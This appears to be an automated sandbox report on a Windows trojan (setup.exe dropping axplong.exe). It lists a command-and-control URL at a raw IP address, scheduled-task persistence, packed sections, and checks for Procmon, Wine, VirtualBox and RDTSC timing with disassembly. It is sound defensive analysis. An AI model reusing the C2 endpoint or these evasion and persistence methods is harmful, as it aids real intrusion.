Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedi
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phps
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?

System Summary
barindex
PE file contains section with special chars
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0050E440 4_2_0050E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00543068 4_2_00543068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00504CF0 4_2_00504CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00537D83 4_2_00537D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0054765B 4_2_0054765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00504AF0 4_2_00504AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0054777B 4_2_0054777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00546F09 4_2_00546F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00548720 4_2_00548720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_00542BD0 4_2_00542BD0
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: setup.exe Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: axplong.exe.0.dr Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: setup.exe Static file information: File size 1933312 > 1048576
Source: setup.exe Static PE information: Raw size of aosdyjib is bigger than: 0x100000 < 0x1a6400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 4.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
Source: setup.exe Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: aosdyjib
Source: setup.exe Static PE information: section name: ttauocqi
Source: setup.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: aosdyjib
Source: axplong.exe.0.dr Static PE information: section name: ttauocqi
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051D84C push ecx; ret 4_2_0051D85F
Source: setup.exe Static PE information: section name: entropy: 7.982355367742593
Source: setup.exe Static PE information: section name: aosdyjib entropy: 7.955301660952693
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.982355367742593
Source: axplong.exe.0.dr Static PE information: section name: aosdyjib entropy: 7.955301660952693
Drops PE files
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 1FEA45 second address: 1FEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 1FEA49 second address: 1FEA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 1FEA5F second address: 1FEA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 37BAA0 second address: 37BAC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48277h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38115F second address: 381165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 381165 second address: 381172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F47D8E4826Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 37BA7D second address: 37BAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F47D8E3B0A6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383116 second address: 38311A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38311A second address: 383124 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383124 second address: 383129 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383129 second address: 38317C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F47D8E3B0B8h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F47D8E3B0ADh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ecx 0x00000019 jnl 00007F47D8E3B0B0h 0x0000001f jmp 00007F47D8E3B0AAh 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F47D8E3B0A8h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383228 second address: 383231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383231 second address: 383235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383235 second address: 383272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 19527DC1h 0x0000000e mov di, 1A5Dh 0x00000012 push 00000003h 0x00000014 ja 00007F47D8E4826Ch 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1AA4h], esi 0x00000022 push 00000003h 0x00000024 mov si, 955Ch 0x00000028 mov esi, 0D0CE35Fh 0x0000002d push D018154Eh 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383272 second address: 3832A3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xor dword ptr [esp], 1018154Eh 0x00000012 mov ch, 86h 0x00000014 mov esi, dword ptr [ebp+122D3684h] 0x0000001a lea ebx, dword ptr [ebp+1245806Ah] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F47D8E3B0ABh 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3832A3 second address: 3832A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38338D second address: 3833B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F47D8E3B0A8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3833B5 second address: 3833BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3833BF second address: 3833C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3833C3 second address: 383435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c jbe 00007F47D8E48266h 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 jmp 00007F47D8E48276h 0x0000001e pop eax 0x0000001f pop eax 0x00000020 xor ecx, 15AEA406h 0x00000026 push 00000003h 0x00000028 mov cx, di 0x0000002b push 00000000h 0x0000002d mov si, dx 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F47D8E48268h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov cx, di 0x0000004f push 4C96DD0Fh 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007F47D8E48268h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383435 second address: 383483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 736922F1h 0x00000011 or cx, D831h 0x00000016 lea ebx, dword ptr [ebp+12458073h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F47D8E3B0A8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 sub dl, FFFFFFCEh 0x00000039 movzx ecx, bx 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007F47D8E3B0A8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 383600 second address: 38360A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3962DD second address: 3962E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3962E1 second address: 3962FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F47D8E4826Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3962FF second address: 396303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
